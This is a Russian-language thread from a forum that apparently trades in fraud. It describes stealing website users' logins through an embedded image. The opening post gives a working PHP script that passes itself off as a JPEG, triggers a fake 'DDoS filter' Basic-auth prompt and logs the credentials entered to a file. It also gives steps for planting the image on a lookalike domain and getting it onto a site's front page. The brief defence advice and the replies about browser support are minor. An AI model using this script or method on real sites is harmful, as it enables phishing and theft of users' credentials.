1
  1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

Взлом пользователей через картинку

Тема в разделе "Чужие", создана пользователем Kelvin, 31 авг 2016.

  1. TopicStarter Overlay
    Kelvin

    Kelvin Sin Cera

    Регистрация:
    10 май 2012
    Сообщения:
    517
    Симпатии:
    390
    Правильно люди говорят: «Все новое — это хорошо забытое старое»

    Возможность встраивания удалённых ресурсов (например картинок с других сайтов) на страницу своего сайта — очень плохая практика. Которая может в определённый момент привести к довольно серьёзным последствиям для сайта. Еще 10 лет назад, я с удивлением читал о том, что такое возможно. И вот прошло 10 лет, ничего не изменилось, и похоже на то, что это вряд ли когда то изменится.

    Детали под катом

    Теория и практика

    1. Хакер злой пользователь регистрирует себе домен похожий по написанию на атакуемый домен.
    2. Загружает на него скрипт c таким содержимым на PHP
    PHP:
    <?php
    if (!isset($_SERVER['PHP_AUTH_USER'])) {
        
    $vulnsite parse_url($_SERVER['REFERER']);
        
    //header('Content-Type: text/html; charset=windows-1251');
        //header('WWW-Authenticate: Basic realm="'.ucfirst($vulnsite['host']).' DDoS-Filter: Enter your Login and Password"');
        //header('HTTP/1.0 401 Unauthorized');
    } else {
        
    $f fopen('passes.txt''a');
        
    fwrite($f$_SERVER['PHP_AUTH_USER'].';'.$_SERVER['PHP_AUTH_PW']."\r\n"); 
        
    fclose($f);
    }
    header("Content-type: image/jpeg");
    $image imagecreatefromjpeg('image.jpg');
    imagejpeg($image);
    imagedestroy($image);
    exit();

    //Соответственно в этой же папке лежит нормальная image.jpg
    //Тут же можно поиграться с расширением скрипта и обозвать его superphoto.jpg .
    ?>
    3. Пишет статью, и встраивает картинку в пост:

    <img src="Please login or register to view links" alt="image"/>

    4. Если присутствует модерация на сайте, то отправляет статью на модерацию.
    5. К примеру статья получилась у него хорошая и она попадает на главную.
    6. Злой человек видит своё детище на главной и убирает комментарии в PHP коде, таким образом в ответ на запрос картинки из поста, у любого пользователя в браузере появляется окно с авторизацией, где может быть написано все что угодно, к примеру что сайт отбивается от ДДос атаки, и просит повторить ввод логина и пароля.
    7. Не внимательный пользователь, не вчитывается в название домена в форме авторизации и субмитит логин и пароль.
    8. Злой человек получает ваш логин и пароль, его цель достигнута.

    Способы защиты

    Думаю вменяемых методов может быть два:

    • На уровне браузеров: запрет на выдачу окна авторизации от другого сайта
    • На уровне разработчиков сайтов: Копирование всех удалённых ресурсов к себе на хостинг
    P.S Работает не во всех браузерах, в статью намеренно не вставил подобную картинку дабы ещё раз не забанили :D
     
    • Like Like x 3
    Метки:
  2. ResH

    ResH Команда форума

    Регистрация:
    26 июл 2012
    Сообщения:
    1.676
    Симпатии:
    2.268
    Работает только на мозилле который жрет 700 000 мб памяти но почему то до сих пор не додумались исправить эту хуйню
     
  3. TopicStarter Overlay
    Kelvin

    Kelvin Sin Cera

    Регистрация:
    10 май 2012
    Сообщения:
    517
    Симпатии:
    390
    В старой версии оперы тоже пашет
     
  4. ResH

    ResH Команда форума

    Регистрация:
    26 июл 2012
    Сообщения:
    1.676
    Симпатии:
    2.268
    Когда я тебя банил работал только на мозилле :D
     
    • Like Like x 1
  5. TopicStarter Overlay
    Kelvin

    Kelvin Sin Cera

    Регистрация:
    10 май 2012
    Сообщения:
    517
    Симпатии:
    390
    :cray:
     
    • Agree Agree x 1

Поделиться этой страницей

Загрузка...